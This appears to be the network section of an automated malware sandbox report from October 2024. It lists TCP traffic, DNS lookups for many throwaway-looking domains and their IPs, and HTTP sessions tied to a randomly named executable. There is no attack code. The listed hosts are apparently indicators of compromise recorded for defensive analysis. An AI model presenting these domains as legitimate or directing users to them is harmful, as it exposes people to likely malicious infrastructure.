                                                                        Oct 8, 2024 16:35:09.392776966 CEST8050018217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:09.393191099 CEST8050018217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:09.393251896 CEST5001880192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:10.319777012 CEST5001880192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:11.338428020 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:11.488181114 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.488271952 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:11.502243042 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:11.507563114 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507579088 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507590055 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507600069 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507608891 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507616997 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507626057 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507635117 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:11.507643938 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.005497932 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:13.135819912 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.135881901 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:13.135895014 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.135906935 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.135936975 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:13.135966063 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:13.136502981 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.136543989 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:13.137814045 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.137856007 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:13.138717890 CEST8050019217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:13.138773918 CEST5001980192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:14.028748035 CEST5002080192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:14.033871889 CEST8050020217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:14.034051895 CEST5002080192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:14.043005943 CEST5002080192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:14.050405025 CEST8050020217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:14.672527075 CEST8050020217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:14.672616005 CEST8050020217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:14.672698975 CEST8050020217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:14.675772905 CEST5002080192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:14.675772905 CEST5002080192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:14.680685997 CEST8050020217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:21.046747923 CEST5002180192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:21.052447081 CEST805002163.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:21.052520990 CEST5002180192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:21.067187071 CEST5002180192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:21.072046995 CEST805002163.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:21.787060976 CEST805002163.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:21.787108898 CEST805002163.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:21.787157059 CEST5002180192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:22.583673000 CEST5002180192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:23.603425980 CEST5002280192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:23.608508110 CEST805002263.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:23.610059977 CEST5002280192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:23.621690035 CEST5002280192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:23.626600027 CEST805002263.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:24.220685005 CEST805002263.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:24.221061945 CEST805002263.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:24.221471071 CEST5002280192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:25.130553961 CEST5002280192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:26.151499033 CEST5002380192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:26.241962910 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.242151022 CEST5002380192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:26.255626917 CEST5002380192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:26.260742903 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.260868073 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.260919094 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.260946989 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.260973930 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.260999918 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.261027098 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.261059999 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.263627052 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.921124935 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.921251059 CEST805002363.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:26.921303988 CEST5002380192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:27.771373034 CEST5002380192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:28.795824051 CEST5002480192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:28.802409887 CEST805002463.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:28.808836937 CEST5002480192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:28.818638086 CEST5002480192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:28.824367046 CEST805002463.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:29.400230885 CEST805002463.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:29.400391102 CEST805002463.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:29.400430918 CEST5002480192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:29.403633118 CEST5002480192.168.2.463.250.47.40
                                                                        Oct 8, 2024 16:35:29.408571959 CEST805002463.250.47.40192.168.2.4
                                                                        Oct 8, 2024 16:35:34.435528040 CEST5002580192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:34.440704107 CEST805002591.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:34.440957069 CEST5002580192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:34.452384949 CEST5002580192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:34.457371950 CEST805002591.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:35.132344961 CEST805002591.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:35.132374048 CEST805002591.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:35.132417917 CEST5002580192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:35.958698988 CEST5002580192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:36.978768110 CEST5002680192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:36.983808994 CEST805002691.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:36.983875990 CEST5002680192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:36.998725891 CEST5002680192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:37.003684044 CEST805002691.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:37.637835026 CEST805002691.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:37.637964964 CEST805002691.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:37.638029099 CEST5002680192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:38.505673885 CEST5002680192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:39.526238918 CEST5002780192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:39.738636971 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.738728046 CEST5002780192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:39.753546953 CEST5002780192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:39.758513927 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758548975 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758589983 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758599043 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758706093 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758716106 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758797884 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758807898 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:39.758811951 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:40.493004084 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:40.493032932 CEST805002791.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:40.497998953 CEST5002780192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:41.258599997 CEST5002780192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:42.274813890 CEST5002880192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:42.279771090 CEST805002891.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:42.279973030 CEST5002880192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:42.287867069 CEST5002880192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:42.293370962 CEST805002891.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:42.902800083 CEST805002891.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:42.903681040 CEST805002891.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:42.903754950 CEST5002880192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:42.906014919 CEST5002880192.168.2.491.184.0.200
                                                                        Oct 8, 2024 16:35:42.911441088 CEST805002891.184.0.200192.168.2.4
                                                                        Oct 8, 2024 16:35:47.930179119 CEST5002980192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:47.934983015 CEST805002913.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:47.935965061 CEST5002980192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:47.947877884 CEST5002980192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:47.953037024 CEST805002913.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:48.432420969 CEST805002913.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:48.432482004 CEST5002980192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:49.458779097 CEST5002980192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:49.463730097 CEST805002913.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:50.477797985 CEST5003080192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:50.482989073 CEST805003013.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:50.483133078 CEST5003080192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:50.494606972 CEST5003080192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:50.499946117 CEST805003013.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:50.957473040 CEST805003013.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:50.957525015 CEST5003080192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:52.005681992 CEST5003080192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:52.254498959 CEST805003013.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.024894953 CEST5003180192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:53.233117104 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.233215094 CEST5003180192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:53.247423887 CEST5003180192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:53.252402067 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.252412081 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.252420902 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.252433062 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.252469063 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.252477884 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.252506018 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.253309965 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.253334999 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.691585064 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:53.691643953 CEST5003180192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:54.755703926 CEST5003180192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:54.760746002 CEST805003113.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:55.775307894 CEST5003280192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:55.780947924 CEST805003213.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:55.781034946 CEST5003280192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:55.789122105 CEST5003280192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:55.794038057 CEST805003213.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:56.288558960 CEST805003213.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:56.288618088 CEST805003213.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:35:56.288841963 CEST5003280192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:56.292220116 CEST5003280192.168.2.413.248.169.48
                                                                        Oct 8, 2024 16:35:56.297015905 CEST805003213.248.169.48192.168.2.4
                                                                        Oct 8, 2024 16:36:15.613529921 CEST5003780192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:15.618882895 CEST805003743.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:15.618952036 CEST5003780192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:15.630598068 CEST5003780192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:15.635508060 CEST805003743.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:16.502734900 CEST805003743.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:16.503206015 CEST805003743.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:16.506159067 CEST5003780192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:17.146498919 CEST5003780192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:18.167521000 CEST5003880192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:18.172797918 CEST805003843.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:18.172966957 CEST5003880192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:18.184499025 CEST5003880192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:18.189511061 CEST805003843.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:19.053726912 CEST805003843.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:19.055104017 CEST805003843.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:19.055162907 CEST5003880192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:19.098870993 CEST805003843.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:19.098938942 CEST5003880192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:19.693242073 CEST5003880192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:20.712112904 CEST5003980192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:20.718108892 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.718442917 CEST5003980192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:20.728841066 CEST5003980192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:20.733738899 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733751059 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733762026 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733834028 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733843088 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733851910 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733865023 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.733927011 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:20.734517097 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:21.606004000 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:21.606134892 CEST805003943.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:21.606189966 CEST5003980192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:22.240268946 CEST5003980192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:23.269835949 CEST5004080192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:23.274727106 CEST805004043.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:23.274791956 CEST5004080192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:23.290067911 CEST5004080192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:23.295042992 CEST805004043.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:24.174876928 CEST805004043.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:24.175364971 CEST805004043.242.202.169192.168.2.4
                                                                        Oct 8, 2024 16:36:24.175518036 CEST5004080192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:24.180017948 CEST5004080192.168.2.443.242.202.169
                                                                        Oct 8, 2024 16:36:24.184894085 CEST805004043.242.202.169192.168.2.4
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 8, 2024 16:33:57.829544067 CEST5048653192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:33:58.316391945 CEST53504861.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:34:03.337913990 CEST5673953192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:34:03.348748922 CEST53567391.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:34:08.368325949 CEST5509953192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:34:09.057019949 CEST53550991.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:34:24.622490883 CEST6034853192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:34:24.650665998 CEST53603481.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:34:37.790368080 CEST5682953192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:34:38.400415897 CEST53568291.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:34:51.743760109 CEST5090753192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:34:51.898288965 CEST53509071.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:35:05.556327105 CEST5587053192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:35:05.720515966 CEST53558701.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:35:19.681600094 CEST5347853192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:35:20.679812908 CEST5347853192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:35:21.043582916 CEST53534781.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:35:21.043616056 CEST53534781.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:35:34.415728092 CEST6222053192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:35:34.432383060 CEST53622201.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:35:47.915585041 CEST5556553192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:35:47.927587986 CEST53555651.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:36:01.305721998 CEST6498453192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:36:14.931503057 CEST5106153192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:36:15.611063004 CEST53510611.1.1.1192.168.2.4
                                                                        Oct 8, 2024 16:36:29.198466063 CEST6273153192.168.2.41.1.1.1
                                                                        Oct 8, 2024 16:36:29.672023058 CEST53627311.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 16:33:57.829544067 CEST | 192.168.2.4 | 1.1.1.1 | 0x82f0 | Standard query (0) | www.woshop.online | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:34:03.337913990 CEST | 192.168.2.4 | 1.1.1.1 | 0xa947 | Standard query (0) | www.kxshopmr.store | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:34:08.368325949 CEST | 192.168.2.4 | 1.1.1.1 | 0xd42d | Standard query (0) | www.elsupertodo.net | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:34:24.622490883 CEST | 192.168.2.4 | 1.1.1.1 | 0xad91 | Standard query (0) | www.omexai.info | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:34:37.790368080 CEST | 192.168.2.4 | 1.1.1.1 | 0xef32 | Standard query (0) | www.tekilla.wtf | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:34:51.743760109 CEST | 192.168.2.4 | 1.1.1.1 | 0x41a8 | Standard query (0) | www.bola88site.one | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:35:05.556327105 CEST | 192.168.2.4 | 1.1.1.1 | 0xfcb6 | Standard query (0) | www.languagemodel.pro | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:35:19.681600094 CEST | 192.168.2.4 | 1.1.1.1 | 0x2945 | Standard query (0) | www.kexweb.top | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:35:20.679812908 CEST | 192.168.2.4 | 1.1.1.1 | 0x2945 | Standard query (0) | www.kexweb.top | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:35:34.415728092 CEST | 192.168.2.4 | 1.1.1.1 | 0xca74 | Standard query (0) | www.jobworklanka.online | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:35:47.915585041 CEST | 192.168.2.4 | 1.1.1.1 | 0xa03a | Standard query (0) | www.dyme.tech | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:36:01.305721998 CEST | 192.168.2.4 | 1.1.1.1 | 0x8345 | Standard query (0) | www.arlon-commerce.com | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:36:14.931503057 CEST | 192.168.2.4 | 1.1.1.1 | 0x3405 | Standard query (0) | www.mizuquan.top | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:36:29.198466063 CEST | 192.168.2.4 | 1.1.1.1 | 0x705 | Standard query (0) | www.nobartv6.website | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 16:33:58.316391945 CEST | 1.1.1.1 | 192.168.2.4 | 0x82f0 | Name error (3) | www.woshop.online | none | none | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:34:03.348748922 CEST | 1.1.1.1 | 192.168.2.4 | 0xa947 | Name error (3) | www.kxshopmr.store | none | none | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:34:09.057019949 CEST | 1.1.1.1 | 192.168.2.4 | 0xd42d | No error (0) | www.elsupertodo.net |  | 148.72.152.174 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:34:24.650665998 CEST | 1.1.1.1 | 192.168.2.4 | 0xad91 | No error (0) | www.omexai.info | omexai.info |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 16:34:24.650665998 CEST | 1.1.1.1 | 192.168.2.4 | 0xad91 | No error (0) | omexai.info |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:34:24.650665998 CEST | 1.1.1.1 | 192.168.2.4 | 0xad91 | No error (0) | omexai.info |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:34:38.400415897 CEST | 1.1.1.1 | 192.168.2.4 | 0xef32 | No error (0) | www.tekilla.wtf | redirect.3dns.box |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 16:34:38.400415897 CEST | 1.1.1.1 | 192.168.2.4 | 0xef32 | No error (0) | redirect.3dns.box |  | 172.191.244.62 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:34:51.898288965 CEST | 1.1.1.1 | 192.168.2.4 | 0x41a8 | No error (0) | www.bola88site.one | bola88site.one |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 16:34:51.898288965 CEST | 1.1.1.1 | 192.168.2.4 | 0x41a8 | No error (0) | bola88site.one |  | 172.96.191.39 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:35:05.720515966 CEST | 1.1.1.1 | 192.168.2.4 | 0xfcb6 | No error (0) | www.languagemodel.pro | webredir.vip.gandi.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 16:35:05.720515966 CEST | 1.1.1.1 | 192.168.2.4 | 0xfcb6 | No error (0) | webredir.vip.gandi.net |  | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:35:21.043582916 CEST | 1.1.1.1 | 192.168.2.4 | 0x2945 | No error (0) | www.kexweb.top |  | 63.250.47.40 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:35:21.043616056 CEST | 1.1.1.1 | 192.168.2.4 | 0x2945 | No error (0) | www.kexweb.top |  | 63.250.47.40 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:35:34.432383060 CEST | 1.1.1.1 | 192.168.2.4 | 0xca74 | No error (0) | www.jobworklanka.online | jobworklanka.online |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 16:35:34.432383060 CEST | 1.1.1.1 | 192.168.2.4 | 0xca74 | No error (0) | jobworklanka.online |  | 91.184.0.200 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:35:47.927587986 CEST | 1.1.1.1 | 192.168.2.4 | 0xa03a | No error (0) | www.dyme.tech |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:35:47.927587986 CEST | 1.1.1.1 | 192.168.2.4 | 0xa03a | No error (0) | www.dyme.tech |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:36:01.581528902 CEST | 1.1.1.1 | 192.168.2.4 | 0x8345 | No error (0) | www.arlon-commerce.com | whois-unverified.domainbox.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 16:36:15.611063004 CEST | 1.1.1.1 | 192.168.2.4 | 0x3405 | No error (0) | www.mizuquan.top |  | 43.242.202.169 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 16:36:29.672023058 CEST | 1.1.1.1 | 192.168.2.4 | 0x705 | No error (0) | www.nobartv6.website |  | 103.224.182.242 | A (IP address) | IN (0x0001) | false
                                                                        • www.elsupertodo.net
                                                                        • www.omexai.info
                                                                        • www.tekilla.wtf
                                                                        • www.bola88site.one
                                                                        • www.languagemodel.pro
                                                                        • www.kexweb.top
                                                                        • www.jobworklanka.online
                                                                        • www.dyme.tech
                                                                        • www.mizuquan.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 148.72.152.174 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
